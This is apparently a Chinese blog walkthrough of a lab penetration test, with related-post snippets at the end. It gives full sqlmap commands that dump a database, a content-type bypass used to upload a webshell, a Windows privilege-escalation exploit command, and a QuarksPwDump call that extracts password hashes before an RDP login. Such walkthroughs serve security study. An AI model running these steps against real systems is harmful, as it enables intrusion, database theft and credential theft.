记一次简单的渗透测试流程

最新推荐文章于 2024-08-15 14:55:31 发布
最新推荐文章于 2024-08-15 14:55:31 发布
阅读量734 收藏 8
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45773001/article/details/107494181
版权

记一次简单的渗透测试(从信息收集到远程桌面登录)

一.信息收集

  • 你是否做了足够的信息收集?
    第一次拿到这个页面之后尝试了用一些常用的密码登录,发现不可以登录;
    在这里插入图片描述
  • 之后查看页面源代码,审查元素发现得到一些信息,他是php语言,用的是IIS7.5;
    在这里插入图片描述
    在这里插入图片描述
  • 然后进行端口扫描,目录爆破;(这里使用nmap和御剑)
    在这里插入图片描述
    在这里插入图片描述
  • 扫描目录后发现www,zip是网站所有的目录,审查的时候发现了账号密码;在这里插入图片描述
    在这里插入图片描述
    二.网页中的敏感信息
  • 网站中经常会有一些敏感信息泄露出来在这里插入图片描述
    三.登录网站之后有没有新的漏洞发现
  • 登录成功之后可以利用bp抓包分析页面,抓完包之后发送到repeater页面,尝试sql注入,and 1=1 发现没有异常,and 1=2 发现异常,所以这里是数值型注入;
    在这里插入图片描述
    在这里插入图片描述
  • 判断出是数值型注入之后,判断他的显示位,order by 发现他的显示位是6个;
    在这里插入图片描述
    在这里插入图片描述
  • 接下来我们可以用sqlmap进行下面的操作,
    Sqlmap -u http://192.168.100.100/member/userinfo.php --cookie “PHPSESSID=89fepnov10tlpnig9fvtrf8v33; id=1” -p id --dbms mysql --technique U --union-cols 6 -p是因为我们发现他的id有问题 --technique 是指定类型,因为我们发现他是联合查询注入,所以是U 。Union-cols是指定显示位。下图发现有警告是因为我们的操作级别不够,所以给他设置高的级别;
    在这里插入图片描述
  • Sqlmap -u http://192.168.100.100/member/userinfo.php --cookie “PHPSESSID=89fepnov10tlpnig9fvtrf8v33; id=1” -p id --dbms mysql --technique U --union-cols 6 --level 3
    在这里插入图片描述
  • 从上图中我们可以看出他有两个数据库,接下来我们利用下面语句查询他当前的使用者
    sqlmap -u http://192.168.100.100/member/userinfo.php --cookie “PHPSESSID=89fepnov10tlpnig9fvtrf8v33; id=1” -p id --dbms mysql --technique U --union-cols 6 --level 3 --users
    在这里插入图片描述
  • 上图我们已经查询出他当前的使用者,我们利用下面的语句查询email数据库中都有什么表
    sqlmap -u http://192.168.100.100/member/userinfo.php --cookie “PHPSESSID=89fepnov10tlpnig9fvtrf8v33; id=1” -p id --dbms mysql --technique U --union-cols 6 --level 3 -D email --tables
    在这里插入图片描述
  • 上图中发现有5个表,依次查询表内信息;
    在这里插入图片描述
  • 从上图中我们可以看出我们想要的内容已经查询出来了,我们继续可以往下面做
    sqlmap -u http://192.168.100.100/member/userinfo.php --cookie “PHPSESSID=89fepnov10tlpnig9fvtrf8v33; id=1” -p id --dbms mysql --technique U --union-cols 6 --level 3 -D email --dump-all,利用该语句我们查询出所有的内容,其中发现这个对我们很有用,在扫描后台目录的时候我们发现有个manager页面,所以我们可以尝试利用这个登录;

在这里插入图片描述
四.文件上传点是一个经常出现漏洞的地方

  • 登录之后发现的页面
    在这里插入图片描述
  • 点击修改图片处上传一个正确的图片,用bp抓包分析一下;
    在这里插入图片描述
  • 根据我们上传成功之后的分析,我们再次上传php文件时还利用bp抓包,首先修改后缀名为jpeg发现是不可以的,所以后缀名这里我们放弃,然后尝试修改他的content-type
    在这里插入图片描述
  • 我们修改成允许的文件类型之后再次点击go,发现上传成功;
    在这里插入图片描述
  • 在下面这个图里面我们可以看出来已经上传成功,按f12找到我们上传的图片路径并访问发现我们上传的已经成功了;
    在这里插入图片描述
    在这里插入图片描述
  • 到这个页面之后,我们可以上传一个大马;
    在这里插入图片描述
  • 上传大马成功后访问路径登录,

在这里插入图片描述
五.拿到webshell之后,要不要登录系统呢

  • 首先应该想到就是提权,我们先查看系统信息,发现systeminfo不行,我们把他重定向到一个文件里面(>1.txt);
    在这里插入图片描述

  • 发现了他的系统信息,并且发现他就打了一个补丁;
    在这里插入图片描述

  • 上传提权的工具;
    在这里插入图片描述

  • 上传成功之后,我们利用他执行提权命令,发现已经提权成功。
    C:/Windows/Temp/ms15-051x64.exe “whoami”
    在这里插入图片描述

  • 提权成功之后尝试用mimikatz获取密码不行,然后又利用创建用户发现也不行,后来想到用QuarksPwDump获取密码,因为即使没有登录过他也有密码记录
    C:/Windows/Temp/ms15-051x64.exe “C:/Windows/Temp/QuarksPwDump.exe --dump-hash-local”
    在这里插入图片描述

  • 获取到密码的hash值之后,利用cmd5解密,获得了管理员密码;
    在这里插入图片描述
    六.远程桌面登录

  • 执行命令netstat -ano获取到了他所开放的端口号,发现3389端口已经开放,所以利用远程桌面登录;
    在这里插入图片描述
    在这里插入图片描述

星星不见了-D
关注
一次对某网站的渗透测试
白帽渗透笔记的博客
07-06 1261
今天正在开开心心的逛着B站,突然微信头像闪动,一看,原来是小黑让我帮忙给一个网站做安全检测,他说这是他叔叔的公司,然后直接丢给我一个链接。 初步测试 拿到网址,首先打开看了一下。 看起来比较简单,注意到右下角有资讯,随便点开一篇。 存在动态参数id,判断一下是否存在SQL注入,尝试使用?id=1586and1=1,直接提示参数非法! 然后继续尝试其他注入方式,依旧提示参数非法!没办法,只好祭出神器SqlMap,一顿操作。 sqlmap-u"http://www....
某平台的一次简单渗透测试
HBohan的博客
11-17 2468
目标 某平台系统(www.target.net) 流程 本次渗透测试的流程图: 【技术资料】 测试 拿到站点后先做信息收集,扫描目录看看有无敏感信息 寥寥无几,没有任何信息,启动burpsuite打开网站走一遍流程。 在创建目标处存在图片上传接口,上传shell试试。 没有任何过滤,可直接上传,但当前目录不解析,猜测projectKey控制上传路径 可跨目录上传,但当前/webapp/test/uploadFile/路径非网站根目录,爆破了常见网站目录但没有一个是正确的解析shell的,先放
一次简单渗透测试
qq_45088344的博客
05-21 315
实验环境:kali,centos8 1.确认靶机 因为是在同一网段下测试的,所以可以直接看本机的ip来缩小靶机的搜索范围 确定了靶机ip范围就可以用nmap搜索 在同一网段下nmap发送arp包来测试存活主机 还能用fping发送icmp包来进行三层测试 nmap -sn 192.168.5.0/24 fping -g 192.168.5.0/24 -s -a 其中192.168.5.133是本机地址,范围就缩小到两个地址,对两个地址再用nmap扫描以确定目标靶机 nm...
渗透测试流程是什么?
最新发布
okcross0的博客
08-15 854
在学习渗透测试之初,有必要先系统了解一下它的流程,静下心来阅读一下,树立一个全局观,一步一步去建设并完善自己的专业领域,最终实现从懵逼到牛逼的华丽转变。渗透测试是通过模拟恶意黑客的,同时也是在授权情况下对目标系统进行安全性测试和评估的过程。需要强调的是,重点是测试,是过程,而不是不计后果的攻击或测试防御,它是一套科学流程,不局限于某一工具或技巧的运用。
一次完整的渗透测试流程
HIM_MRY的博客
08-30 6445
渗透测试 渗透测试就是利用我们所掌握的渗透知识,对网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后撰写一篇测试报告,提供给我们的客户。客户根据我们撰写的测试报告,对网站进行漏洞修补,以防止黑客的入侵! 渗透测试的前提是我们得经过用户的授权,才可以对网站进行渗透。如果我们没有经过客户的授权而对一个网站进行渗透测试的话,这是违法的。去年的6.1日我国颁布了《网络安全法》,对网络犯罪有了法律约束,不懂的移步——> 网络安全法 渗透测试分为白盒测试和黑盒测试 1.白盒测试就...
一次简单渗透测试
liqiuman180688的博客
03-18 561
文章作者:丶诺熙 原文链接: http://blog.5am3.com/2018/05/04/web-testing-one/ 某天比较无聊,听一个朋友推荐httpscan这款工具,于是就下载下来试试。 首先对某学校网段开始进行测试。 测试时发现有个比较特殊的标题。一般有这个,证明存在目录遍历。 目录遍历这个漏洞,说大也不大,说小也不小,但是,一般来说,存在这种目录,可以证明网站管理员比较粗...
【网络安全】一次简单渗透测试实战
lzhy666的博客
03-29 392
【网络安全】一次简单渗透测试实战
kali渗透测试:【实验2】一次简单渗透测试实战
qq_38975218的博客
12-05 4728
启动 Kali 容器并进入到 bash 界面里,执行 ping 操作验证网络联通性: # 启动并进入 Kali 容器里的 bash docker run -ti --network host 3f457 bash # 在 Kali 容器中测试虚拟网络连接,使用 Ctrl-C 退出 ping: ping target 在 Kali 容器的 bash 界面里运行以下命令,注意 Nmap 的参数使用: -p:指定扫描的端口范围 -T4:设定 nmap 扫描的时间策略,数字为 0-5,越大越快。扫描的越慢则越
一次GoldenEye靶场渗透测试过程
c_programj的博客
09-16 1624
一次GoldenEye靶场渗透测试过程 靶场下载连接: 链接:https://pan.baidu.com/s/1qSU-0h8S-HyV-tkhGvCe3A 提取码:n2hq 下载完成之后,在VMware直接打开虚拟机,选择该.ova文件即可。 KALI攻击机:192.168.43.126 GoldenEye靶机:192.168.43.27 一、信息收集 1、使用nmap进行信息收集,查找同网段下的主机:namp -sP 192.168.43.0/24 Nmap -sP 扫描所在网段存货主机(可以扫到所在
安全渗透测试 服务器 系统,一次完整的安全渗透测试
weixin_36422050的博客
08-05 1200
网络渗透测试就是利用所有的手段进行测试,发现和挖掘系统中存在的漏洞,然后撰写渗透测试报告,将其提供给客户;客户根据渗透人员提供的渗透测试报告对系统存在漏洞和问题的地方进行修复和修补,本次渗透测试算是针对aspx类型的网站系统的一个补充。下面是整个渗透过程和一些渗透思路,写出来跟大家一起探讨和分享,不到之处请指正。(一)初步的安全渗透测试1.漏洞扫描直接打开JSky Web漏洞扫描器,新建一个扫描任...
渗透测试流程
01-27
渗透测试流程简介 哈哈哈哈 这个简介还是比较厉害的 。
一次简单的web渗透测试
WWE135的博客
04-03 2180
0x01初期探索        用google语法 inurl:php?id=查找有漏洞的页面0x20开始寻找注入漏洞        1.通过简单的sql语句探测(',and 1=1,and 1=2)得出该sql注入为字符型注入(sql语句为:' and '1'='2)              2.构造错误的sql语句,使其爆出数据库类型               3.检测字段数(sql语句:...
一次网站的渗透测试
Hacker_DB的博客
04-14 861
朋友叫我帮忙,对一个网站做一下测试。主要目标是看看能不能进入服务器,收集一些建站者信息。 朋友平时待我不薄,此时怎可出言拒绝?经过授权后,直接开搞! (情景发生时间距今较久,请各位读者酌情参考) 用扫描器扫了一下,没有发现漏洞。发现网站存在CDN: 看了下历史解析录,还好不多。通过判断,确定最后一条为真实IP: 查看下IP绑定的网站,查到3个域名,其中一个无法访问,另一个是个后台: 我们先来看这个后台: 随便输入一个账号和密码,提示数据不存在: 扫了下目录,只扫出个upl
一次完整的渗透测试
LiuWang0314的博客
05-21 2302
目录前言掉坑起因(通达OA前台任意用户登录)掉坑过程一(上传webshell问题)掉坑过程二(cmdshell提权问题)如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 前言 本次渗透测试过程大概是这样的:通达OA前台任意用户登录-上传webshell-获取相关信息-提权c
一次偶然发生的渗透测试
蚁景网安学院
09-25 259
0x00 信息搜集话还要从最近网上转载的一篇文章说起—据说某家校通系统存在后台万能密码登录—于是点进去看了一下,然后从文章的某些特征猜到了这个家校通系统,之后就某度一波,然后就发现一堆网...
一次偶然的渗透测试
qq_42909549的博客
04-04 228
前言 这段时间来任务,需要扫描一批IP。反正也闲的无聊,等扫描完成还需要一段时间,就随手拿了个IP来测试一下。 一、端口扫描 用nmap简单扫描了一下,发现开了80和3306端口, 二、目录扫描 尝试用浏览器访问一下IP,显示403,没有权限访问,如下图: 为了扩大攻击面,扫了一波目录,结果扫出了两目录,如下图: 本来还有些困,看到目录名后一下精神起来了,先尝试访问一下/log.php,如下图: 可以看到,这里泄露了网站的数据库版本,以及网站的绝对路径。 三、弱口令 再来访问一下/phpmyadmi
【萌新】一次渗透小站的过程
Leep0rt的博客
09-07 1005
一开始接触该站 先随便翻阅了一些目录 发现在URL中 “/ProductView.asp?ID=1021    ” 这几个字段格外引人瞩目 于是 二话不说 看看有没有注入点 输入一个  '  看一看  发现报错了!!! 然后惯例 and 1=1, and 1=11 发现存在云锁   突然想起来云锁存在一个绕过的漏洞 具体什么的百度一下看看吧! 云锁s
一次有趣的渗透测试
hl1293348082的专栏
05-16 311
最近在做渗透测试的练习中遇到一个比较有意思的站点,在此录下来,希望能给向我一样刚入安全圈不久的萌新提供一些基本思路吧。 在拿到目标站点的域名时,首要的工作肯定是进行一系列的信息搜集工作,具体搜集哪些信息以及怎么有效搜集,可以参考 Google 或者百度。 下面为了文章的简洁性,我只提及我会利用到的一些站点信息。 首先网站的真实 IP 并没有隐藏在 CDN 后面,直接在 ThreadBook 上查看同 IP 的旁站,显示足足 189 个! 看到这个数的时候,说实话内心是沉重的,虽然可以从众多的旁
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值